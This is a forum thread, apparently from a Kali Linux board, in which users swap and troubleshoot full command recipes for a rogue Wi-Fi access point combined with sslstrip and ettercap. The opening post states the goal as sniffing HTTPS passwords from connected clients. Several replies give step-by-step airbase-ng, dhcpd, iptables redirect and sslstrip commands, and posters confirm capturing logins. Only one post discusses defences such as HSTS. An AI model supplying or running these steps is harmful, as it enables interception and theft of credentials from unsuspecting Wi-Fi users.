PDA

View Full Version : Fake access point + ettercap + sslstrip



anashlali
2013-07-06, 18:13
Hi all

I want to make a fake access point to sniff https passwords, I started the fake access point ((airmong-ng)), and done the iptables forwoarding and dhcp configuration, every thing is good till now, clients get connected and can browse internet, butwhen i start ettercap and sslstrip I can't get any https passwords, the client still browsing, but no passowrds at all, tried many tutorials with diferent configurations but no way, seems like there is some thing wrong with sslstrip.
any way here is my configurations:

wireless=wlan0
internet=eth0

airbase-ng -c 1 -e free-wifi mon0
ifconfig at0 up &&
ifconfig at0 10.0.0.1 netmask 255.255.255.0 &&
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &&
dhcpd


iptables --flush && iptables --table nat --flush && iptables --delete-chain &&
iptables --table nat --delete-chain &&
iptables --append FORWARD --in-interface at0 -j ACCEPT &&
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE &&
echo 1 > /proc/sys/net/ipv4/ip_forward &&
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ##gateway on eth0

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
ettercap -Tqi at0 -M arp:remote // //
sslstrip -akf


dhcpd configurations are correct cause clients get connected and can browse internet,
but as I said no https passwords,

when I run sslstrip I got this:

slstrip 0.9 by Moxie Marlinspike running...
Unhandled error in Deferred:
Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 551, in _runCallbacks
current.result = callback(current.result, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 250, in _checkTimeout
userDeferred.callback(result)
File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 368, in callback
self._startRunCallbacks(result)
File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 464, in _startRunCallbacks
self._runCallbacks()
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 551, in _runCallbacks
current.result = callback(current.result, *args, **kw)
File "/usr/share/sslstrip/sslstrip/ClientRequest.py", line 115, in handleHostResolvedError
self.finish()
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 866, in finish
"Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.



can you tell me what I'm missing here,
thank's all..
anas.

zimmaro
2013-07-09, 11:40
gedit /etc/dhcpd.conf
######################################
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "HOME";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
##############################################
airmon-ng start wlan1 11
airbase-ng -c 11 -e HOME mon0
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
################################################## ####
root@hk3r:~# sslstrip -f -p -k 10000
##########################################
root@hk3r:~# ettercap -p -u -T -q -i at0
############################################

in MY-kali worked-fine:
http://imageshack.us/f/89/1ld1.png/

Hizagashira
2013-07-09, 12:30
gedit /etc/dhcpd.conf
######################################
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "HOME";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
##############################################
root@hk3r:~# airmon-ng start wlan1 11
root@hk3r:~# ifconfig at0 10.0.0.1 netmask 255.255.255.0
root@hk3r:~# ifconfig at0 mtu 1400
root@hk3r:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
root@hk3r:~# iptables --flush
root@hk3r:~# iptables --table nat --flush
root@hk3r:~# iptables --delete-chain
root@hk3r:~# iptables --table nat --delete-chain
root@hk3r:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@hk3r:~# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
root@hk3r:~# iptables -P FORWARD ACCEPT
root@hk3r:~# iptables --append FORWARD --in-interface at0 -j ACCEPT
root@hk3r:~# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
root@hk3r:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
root@hk3r:~# dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
root@hk3r:~# /etc/init.d/isc-dhcp-server start
################################################## ####
root@hk3r:~# sslstrip -f -p -k 10000
##########################################
root@hk3r:~# ettercap -p -u -T -q -i at0
############################################

in MY-kali worked-fine:
http://imageshack.us/f/89/1ld1.png/

thanks a lot zimmaro :)

this is very interesting! useful, simple and effective!

anashlali
2013-07-09, 13:34
@zimmaro

thanx man..
I just reactivate forwording again (( echo 1 > /proc/sys/net/ipv4/ip_forward )) and it's working with my configurations, I think ettercap need -p -u to work without stoping ip forwording so I just reactivate it again.
I'll test your configurations,,,, thank's again
:D

graytips
2013-10-14, 22:59
Hello,

Could you please post the complete steps of this setup with some explanation or request you to point some useful article.

Thanks in advance.

zimmaro
2013-10-15, 07:24
Hello,

Could you please post the complete steps of this setup with some explanation or request you to point some useful article.

Thanks in advance.
hi :)
i made a """video"" of this a.... month ago. ...on my vimeo...if you want to take a look...
http://vimeo.com/73069192


PS:previous need to install isc-dhcp-server

bye

thepoor
2013-11-08, 12:47
Help assist,

I got it to worked but now errors with SSLSTRIP

################################################## ##########################
sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
File "/usr/bin/sslstrip", line 105, in main
reactor.run()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1169, in run
self.mainLoop()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1181, in mainLoop
self.doIteration(t)
File "/usr/lib/python2.7/dist-packages/twisted/internet/pollreactor.py", line 167, in doPoll
log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
################################################## ##################################

thepoor
2013-11-08, 18:04
Finally, got it to work. And it's very scary, I will not use public wifi to check my email or anything except check the weather and read the news.

Thanks for the fantastic tutorial.

zimmaro
2013-11-19, 16:54
Finally, got it to work. And it's very scary, I will not use public wifi to check my email or anything except check the weather and read the news.

Thanks for the fantastic tutorial.
:o:o
TNX
well ... make no mistake ... I .. use .. still .. the "pigeon-traveler"
:D

Attilafx
2013-11-19, 18:30
Will this also capture android devices on the network?
Anybody any experience with it?

thepoor
2013-11-20, 18:35
Will this also capture android devices on the network?
Anybody any experience with it?

I would say any devices that uses a browser to access their email, bank, etc.

zimmaro
2013-11-21, 18:00
Will this also capture android devices on the network?
Anybody any experience with it?

I have no experience on this ... and it is not always obvious! (some browsers & providers are "" "intractable". ") ... but on my Android(SlimSaber 4.3.1) SEEMS to work in my little-test:
https://vimeo.com/79988268

PS:sorry for "very-low"quality....but ...i'm clumsy in handling 2 ""video-devices" in sync:o

brazen
2013-11-22, 13:09
:o:o
TNX
well ... make no mistake ... I .. use .. still .. the "pigeon-traveler"
:D

What is pigeon-traveler? Sounds interesting.

alfoc
2013-11-25, 14:11
...
option domain-name-servers 10.0.0.1;
...
root@hk3r:~# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
...


I've two question:
1- into dhcpd.conf you have specified an dns server. Is configured on 192.168.1.1 and the client use it?
2- is used the rule "...PREROUTING -p udp -j DNAT..." to permit dns request by client?

thank you very much

zimmaro
2013-11-26, 17:01
I've two question:
1- into dhcpd.conf you have specified an dns server. Is configured on 192.168.1.1 and the client use it?
2- is used the rule "...PREROUTING -p udp -j DNAT..." to permit dns request by client?

thank you very much

hi alfoc :)
I'm not really likely to give a correct technique-response (I'm a g0at-tester)
I can try to explain it in MY ignorant-way:
I THINK that this "rule" is closely linked to the fact that the "" victim "" can navigate
Hang the PREROUTING chain (-A PREROUTING) of the NAT table (-t nat) the rule that all udp packets (-p udp) are "up to date" by changing the destination address (-j DNAT) to 192.168.1.1 (router of my-lan-connection-KALI)

sorry for my "bad"" replies && my bad english:o
if someone more prepared than me can help you........&&..me:confused:
bye;)

axeu5
2013-11-27, 23:55
so from what i did understood there its that the nat of "fakeap" works just like the nat of a vm ?

alfoc
2013-12-02, 23:30
I have no experience on this ... and it is not always obvious! (some browsers & providers are "" "intractable". ") ... but on my Android(SlimSaber 4.3.1) SEEMS to work in my little-test:
https://vimeo.com/79988268

PS:sorry for "very-low"quality....but ...i'm clumsy in handling 2 ""video-devices" in sync:o

ok, it works, but can you try again load for example gmail account with "gmail app on android"... it works?

zimmaro
2013-12-03, 10:51
ok, it works, but can you try again load for example gmail account with "gmail app on android"... it works?
i made a fast test in my 4.3.1:
confirmed DON't work with .apks with pre-configured account (i've refresh & sincronizzed)
gmail.apk >>>no sniff
yahoo.apk>>>no sniff
AquaMail.apk setting pluri-accounts>>> no sniff hotmail..BUT ..sniff TWO "italian-mail-providers":p
bye

alfoc
2013-12-03, 11:50
i made a fast test in my 4.3.1:
confirmed DON't work with .apks with pre-configured account (i've refresh & sincronizzed)
gmail.apk >>>no sniff
yahoo.apk>>>no sniff
AquaMail.apk setting pluri-accounts>>> no sniff hotmail..BUT ..sniff TWO "italian-mail-providers":p
bye

I agree and no one says it! :)
I think gmail/facebook/twitter apps works only with 443 port, so sslstrip is useless for them :(
It's a big issue for a fake-AP. Nowadays all users use applications via smartphone to read email etc. :)

abraoximenes
2013-12-04, 09:10
Did the victim not receive any warning, when you attack the https, ? It seems when the attacks happen, it forces the victim to use http. Thanks

Crix75ita
2013-12-06, 14:20
Hi all,
I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to etho
I checked the rules of route seems to be ok.

you have any idea?




root@kali-Cris:/home/cristian# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.255.1 0.0.0.0 UG 0 0 0 eth0
10.0.0.0 10.0.0.254 255.255.255.0 UG 0 0 0 at0
10.0.0.0 * 255.255.255.0 U 0 0 0 at0
192.168.255.0 * 255.255.255.0 U 0 0 0 eth0



root@kali-Cris:/home/cristian# iptables -nvL
Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
pkts bytes target prot opt in out source destination

Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
pkts bytes target prot opt in out source destination
1877 248K ACCEPT all -- at0 * 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- at0 * 0.0.0.0/0 0.0.0.0/0

Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
pkts bytes target prot opt in out source destination


;)

alfoc
2013-12-07, 21:25
Hi all,
I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to etho
I checked the rules of route seems to be ok.

you have any idea?




root@kali-Cris:/home/cristian# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.255.1 0.0.0.0 UG 0 0 0 eth0
10.0.0.0 10.0.0.254 255.255.255.0 UG 0 0 0 at0
10.0.0.0 * 255.255.255.0 U 0 0 0 at0
192.168.255.0 * 255.255.255.0 U 0 0 0 eth0



root@kali-Cris:/home/cristian# iptables -nvL
Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
pkts bytes target prot opt in out source destination

Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
pkts bytes target prot opt in out source destination
1877 248K ACCEPT all -- at0 * 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- at0 * 0.0.0.0/0 0.0.0.0/0

Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
pkts bytes target prot opt in out source destination


;)

I guess that your rules are incorrect. You should have "eth0" interface into FORWARD rules, not "at0". Like this:

Chain FORWARD (policy ACCEPT 6434 packets, 740K bytes)
pkts bytes target prot opt in out source destination
7264 6007K ACCEPT all -- eth0 * 0.0.0.0/0 0.0.0.0/0

My rules:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface eth0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

alfoc
2013-12-07, 21:27
Did the victim not receive any warning, when you attack the https, ? It seems when the attacks happen, it forces the victim to use http. Thanks

Transparent for an "occasional" user. An "advanced" user might notice that the connection use HTTP and not HTTPS.
If the attacker use sslstrip with "-f" option, an advanced user might notice the unusual favicon.

Notes: sslstrip doesn't works if

- the client requests an address with HTTPS directly, for example HTTPS://www.example.com;
- the web site have the support for HSTS, that forces a browser to solely interact with the server using HTTPS;
- the client is a smartphone AND the user use an app (app like gmail, facebook etc. works only with HTTPS). I guess is not so for all applications...;

* notes by http://blog.csnc.ch/tag/sslstrip/

"The very initial request to a HSTS web site may still be http and thus exposed to a standard Man-In-The-Middle attack (Bootstrap MITM). In that phase, an attacker could tamper with the HSTS response header and inject invalid subdomains (DoS), disable HSTS (set max-age to 0) or poison the HSTS cache of the user agent otherwise. However, wrongly stored HSTS policies can be simply removed by clearing the local browser cache."

* HSTS: "HTTP Strict Transport Security (HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click through prompts on browsers." (https://www.owasp.org/index.php/HTTP_Strict_Transport_Security)

Useful install "HTTPS Everywhere" an extension for Firefox and Chrome (https://www.eff.org/https-everywhere).

zimmaro
2013-12-08, 09:10
Hi all,
I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to etho
I checked the rules of route seems to be ok.

you have any idea?




root@kali-Cris:/home/cristian# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.255.1 0.0.0.0 UG 0 0 0 eth0
10.0.0.0 10.0.0.254 255.255.255.0 UG 0 0 0 at0
10.0.0.0 * 255.255.255.0 U 0 0 0 at0
192.168.255.0 * 255.255.255.0 U 0 0 0 eth0



root@kali-Cris:/home/cristian# iptables -nvL
Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
pkts bytes target prot opt in out source destination

Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
pkts bytes target prot opt in out source destination
1877 248K ACCEPT all -- at0 * 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- at0 * 0.0.0.0/0 0.0.0.0/0

Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
pkts bytes target prot opt in out source destination


;)

hi cris :)
if this can help:
in ""my""route with ""my""configuration seems to I have" little-little-different" result in last line..(i think-but i'm not sure is for it)
my example scenario:
ATTACKER:kali1.05-32bit on vmplayer with alfa36nh (used posted-configuration-for fakeAP) connected lan-eth0 (BRIDGE) to my Alice-gateway
VICTIM:notebook win7sp1(FULLY-patched&&AV&&firewallUP)connected to fakeAP(kali) via WI-FI internal-interface (NOT HAVE message restricted-access!!!) free navigation-web to ES:gmail & hotmail
IP ATTACKER-eth0=192.168.1.7
IP victim -wi-fi=192.168.1.3
IP ROUTER(alice)=192.168.1.1
http://imageshack.us/f/22/id9v.png/

bye sorry my english!!
@zoom 1600x1200

Crix75ita
2013-12-09, 14:44
Tanks all for your support,
i tried more times, but the kali machine don't forward the packets. from at0 to internet eth0.

My scenario:
Attacker Kali ETH0 192.168.255.11/24 gw 192.168.255.1 " the last address it's my router to internet "
Attacker Kali AT0 192.168.5.1/24
Victim WIFI 192.168.5.31 " the victim it's connected on fake-ap and, a can ping the Kali netowrk 192.168.5.1 "

Sorry for my bad english
thanks

Cris

Crix75ita
2013-12-10, 11:26
Hi all,
I did some tests and I saw that if I use the ping command from victim to a public ip "Example 8.8.8.8", the ping works, but if I try to ping a host using the name "example google.it" does not work . as if there was a problem with the name resolution via iptables.
I check network parameters set by DHCP and are all correct, ip, gateway, and dns, "example i use the 8.8.8.8 or 8.8.4.4" as dhcpd.conf

have you any idea?
Thanks to all.

Cris

thepoor
2013-12-10, 13:29
Crix,

Can you post the steps that you do? it would be easier for us to debug it for you. I was having the same issue with the connection but I figured it out.

Crix75ita
2013-12-10, 15:34
Crix,

Can you post the steps that you do? it would be easier for us to debug it for you. I was having the same issue with the connection but I figured it out.

Ok, i follow the same procedure, of Zimmaro:

1 - set the wireless card in monitor mode:


airmon-ng start wlan0 11

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2436 NetworkManager
2531 wpa_supplicant
2543 dhclient


Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)


2 - start the fake access point :



root@kali-Cris:/home/cristian# airbase-ng -c 11 -e FAKE-IT mon0
15:55:41 Created tap interface at0
15:55:41 Trying to set MTU on at0 to 1500
15:55:41 Trying to set MTU on mon0 to 1800
15:55:41 Access Point with BSSID 00:1F:xx:xx:xx:xx started.


3 - set the at0 interface


root@kali-Cris:/home/cristian# ifconfig at0
at0 Link encap:Ethernet HWaddr 00:1f:xx:xx:xx:xx
inet addr:192.168.5.1 Bcast:192.168.5.255 Mask:255.255.255.0
inet6 addr: fe80::21f:3cff:fe35:2930/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1400 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:0 (0.0 B) TX bytes:468 (468.0 B)



4 - set the route for network 192.168.5.0/24


root@kali-Cris:/home/cristian# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.255.1 0.0.0.0 UG 0 0 0 eth0
192.168.5.0 192.168.5.1 255.255.255.0 UG 0 0 0 at0
192.168.5.0 * 255.255.255.0 U 0 0 0 at0
192.168.255.0 * 255.255.255.0 U 0 0 0 eth0


5 - edit the dhcpd.conf


root@kali-Cris:/home/cristian# cat /etc/dhcpd.conf

subnet 192.168.5.0 netmask 255.255.255.0 {
authoritative;
range 192.168.5.30 192.168.5.60;
default-lease-time 700;
max-lease-time 8000;
option subnet-mask 255.255.255.0;
option routers 192.168.5.1;
option domain-name-servers 8.8.8.8;
option broadcast-address 192.168.5.255;
}


6 - run dhcp service


root@kali-Cris:/home/cristian# dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
Internet Systems Consortium DHCP Server 4.2.2
Copyright 2004-2011 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Wrote 3 leases to leases file.
Listening on LPF/at0/00:1f:xx:xx:xx:xx/192.168.5.0/24
Sending on LPF/at0/00:1f:xx:xx:xx:xx/192.168.5.0/24
Sending on Socket/fallback/fallback-net

root@kali-Cris:/home/cristian# /etc/init.d/isc-dhcp-server start
[ ok ] Starting ISC DHCP server: dhcpd.


7 - set ip forwarding


root@kali-Cris:/home/cristian# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali-Cris:/home/cristian# cat /proc/sys/net/ipv4/ip_forward
1


8 - clean iptables rules


root@kali-Cris:/home/cristian# iptables --flush
root@kali-Cris:/home/cristian# iptables --table nat --flush
root@kali-Cris:/home/cristian# iptables --delete-chain
root@kali-Cris:/home/cristian# iptables --table nat --delete-chain

9 - Verify the rules


root@kali-Cris:/home/cristian# iptables-save > /home/cristian/Start.rules
root@kali-Cris:/home/cristian# cat /home/cristian/Start.rules
# Generated by iptables-save v1.4.14 on Tue Dec 10 16:11:40 2013
*nat
:PREROUTING ACCEPT [44:4885]
:INPUT ACCEPT [44:4885]
:OUTPUT ACCEPT [8:474]
:POSTROUTING ACCEPT [8:474]
COMMIT
# Completed on Tue Dec 10 16:11:40 2013
# Generated by iptables-save v1.4.14 on Tue Dec 10 16:11:40 2013
*filter
:INPUT ACCEPT [184:27160]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [67:19370]
COMMIT
# Completed on Tue Dec 10 16:11:40 2013

- 10 set a new rules


root@kali-Cris:/home/cristian# iptables --append FORWARD --in-interface at0 -j ACCEPT
root@kali-Cris:/home/cristian# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
root@kali-Cris:/home/cristian# iptables -P FORWARD ACCEPT
root@kali-Cris:/home/cristian# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.255.1

11 - verify


root@kali-Cris:/home/cristian# iptables-save > /home/cristian/New.rules
root@kali-Cris:/home/cristian# cat /home/cristian/New.rules
# Generated by iptables-save v1.4.14 on Tue Dec 10 16:15:17 2013
*nat
:PREROUTING ACCEPT [5:208]
:INPUT ACCEPT [5:208]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p udp -j DNAT --to-destination 192.168.255.1
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
# Completed on Tue Dec 10 16:15:17 2013
# Generated by iptables-save v1.4.14 on Tue Dec 10 16:15:17 2013
*filter
:INPUT ACCEPT [21:2049]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [9:392]
-A FORWARD -i at0 -j ACCEPT
COMMIT
# Completed on Tue Dec 10 16:15:17 2013


ok in this situation, i can pinging a public address from victim's pc, on FAKE AP, in internet, but the victim pc's don't resolve the host names.

Test from victim pc's:


^CMacBook-Pro-di-Cristian:~ Cristian$ ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8): 56 data bytes
64 bytes from 8.8.8.8: icmp_seq=0 ttl=49 time=48.580 ms
64 bytes from 8.8.8.8: icmp_seq=1 ttl=49 time=77.322 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=49 time=61.213 ms
Request timeout for icmp_seq 3
64 bytes from 8.8.8.8: icmp_seq=4 ttl=49 time=74.385 ms
64 bytes from 8.8.8.8: icmp_seq=5 ttl=49 time=73.112 ms
64 bytes from 8.8.8.8: icmp_seq=6 ttl=49 time=73.091 ms
64 bytes from 8.8.8.8: icmp_seq=7 ttl=49 time=72.951 ms
64 bytes from 8.8.8.8: icmp_seq=8 ttl=49 time=107.321 ms
64 bytes from 8.8.8.8: icmp_seq=9 ttl=49 time=61.472 ms
64 bytes from 8.8.8.8: icmp_seq=10 ttl=49 time=70.749 ms
64 bytes from 8.8.8.8: icmp_seq=11 ttl=49 time=75.128 ms
64 bytes from 8.8.8.8: icmp_seq=12 ttl=49 time=68.981 ms
Request timeout for icmp_seq 13

--- 8.8.8.8 ping statistics ---
15 packets transmitted, 12 packets received, 20.0% packet loss
round-trip min/avg/max/stddev = 48.580/72.025/107.321/13.169 ms

^CMacBook-Pro-di-Cristian:~ Cristian$ ping google.it
ping: cannot resolve google.it: Unknown host
MacBook-Pro-di-Cristian:~ Cristian$


Thanks
:-D

Cris

thepoor
2013-12-11, 13:15
Crix,

You left out the important step, you need to set which interface has access to the internet. (if ethernet, eth0. If one of your wireless, wlan0 or wlan1) first.
wireless=wlan1
internet=eth0

I have it works for me, so follow my steps to see if it works for you:

Step 1:
wireless=wlan1 //AP interface
internet=eth0 //interface with internet access. if it's your wireless (usually wlan0) , change it to wlan0 then also change wherever you see eth0 with wlan0.

Step 2:
gedit /etc/dhcpd.conf
#######################
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
#########
Step 3:
airmon-ng start wlan1
airbase-ng -e "AnyNameHere" -c 12 mon0
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
/etc/init.d/isc-dhcp-server start

step 4: open another terminal

sslstrip -f -p -k 10000

Step 5: open another terminal

ettercap -p -u -T -q -i at0

step 6: use your device open browser and try to go to yahoo.com or google.com login and you will see the info.

Crix75ita
2013-12-11, 13:44
Yes It works, using only these three rules:


iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


in the original post was also



iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT


Ok .
thanks alot

Csis

zimmaro
2013-12-11, 15:53
hi :)
thanks for share
with this config...in MY-CASE i've error to start isc-dhcp-server

thepoor
2013-12-11, 15:55
hi :)
thanks for share
with this config...in MY-CASE i've error to start isc-dhcp-server

Can you post the error message?

zimmaro
2013-12-11, 16:40
Can you post the error message?
nothing.. solve ..delete old logs & now the server start!!!:p
...but i don't connect to fake_AP....:confused:

thepoor
2013-12-11, 17:33
nothing.. solve ..delete old logs & now the server start!!!:p
...but i don't connect to fake_AP....:confused:

:p, but that was your code.

zimmaro
2013-12-11, 17:52
:p, but that was your code.
1)with """MY""" dhcpd.conf && with """MY""" procedure WORKED PERFECT!!! in my """lan-house-country-provider";)
2)with the last posted i tryed but not connect to fakeAP

PS: the-code is not MY i'only SHARED my positive-test in my lan after 12345600000000 of proofsss:o

http://imageshack.us/f/20/8wmd.png/

chopin
2014-02-24, 15:21
Hello everyone, I Zimmaro method works, but I wanted to know if you can do a dns spoofing with ettercap so you can try a webexploit ... Thanks

tercer_ojo
2014-04-16, 16:43
Hi there. i think my case requires some expertise i don't possess about route/iptables. Let me explain: in my notebook, i have an usb RT3070 wifi card, and the onboard Broadcom wifi card. My intention is to:
1. connect the Broadcom wifi [wlan0] to any hotspot,
2. use the usb Ralink wifi [wlan1] to create a RAP, --> [at0]
3. start a DHCP daemon listening on [at0] to lease addresses,
4. route the traffic from [at0] to [wlan0] to allow normal navigation
5. attach ettercap + sslstrip to at0.

so far, following zimmaro's approach, i've managed to create the RAP, start the DHCP listening on at0, and ettercap/sslstrip don't complain about anything. however, there's no routing between the test client (android device) and [wlan0], which in practice means that i cannot navigate from the cellphone, and therefore i can't get any data on ettercap/sslstrip.

THINGS I'VE TRIED:

* every little variation posted in this thread about route and iptables. obviously replacing the internet-facing device with [wlan0], to reflect that i'm not using [eth0] but the connected onboard wifi card.

* DNS are set in dhcpd.conf as 8.8.8.8

i am 80% sure this is about iptables and route. either i'm allowing traffic through a static route that is not created/not working as intended, or i'm denying traffic thru a route well/wrongly created.

i'm gonna stay online waiting & replying. Thanks very much in advance.

seen_bawl
2014-05-25, 05:07
this work with me try it

#Open Term1
airmon-ng start wlan1
airbase-ng -e "DumDum" -c 11 -v mon0

#Open Term2
#Install a DHCP for your access point
nano /etc/dhcp3/dhcpd.conf

default-lease-time 700;
max-lease-time 8000;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}


#start your new WifiRouter.
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

#Start your WifiRouters DHCP
echo > '/var/lib/dhcp/dhcpd.leases'
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0

#open Term3
#clear any old iptables and nats you might have

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

#change directory in to ssl stripper to make life easyer
cd /usr/share/sslstrip/
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 4444
echo "1" > /proc/sys/net/ipv4/ip_forward

#Start SSL Stripper
./sslstrip.py -l 4444 -w password.txt

Noob_4_Life
2014-05-28, 14:28
Hi,
I also want to make a fake access point and got the following problem when I'm going to act on the instructions above:

############################################
root@kali:~# airmon-ng start wlan1 11


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2355 NetworkManager
2515 wpa_supplicant
2541 dhclient
3149 dhclient
Process with PID 2541 (dhclient) is running on interface wlan0


Interface Chipset Driver

mon0 Atheros ath5k - [phy0]
wlan0 Atheros ath5k - [phy0]

root@kali:~# airbase-ng -c 11 -e HOME mon0
15:28:41 Created tap interface at0
15:28:41 Trying to set MTU on at0 to 1500
15:28:41 Access Point with BSSID 00:16:44:86:D1:42 started.
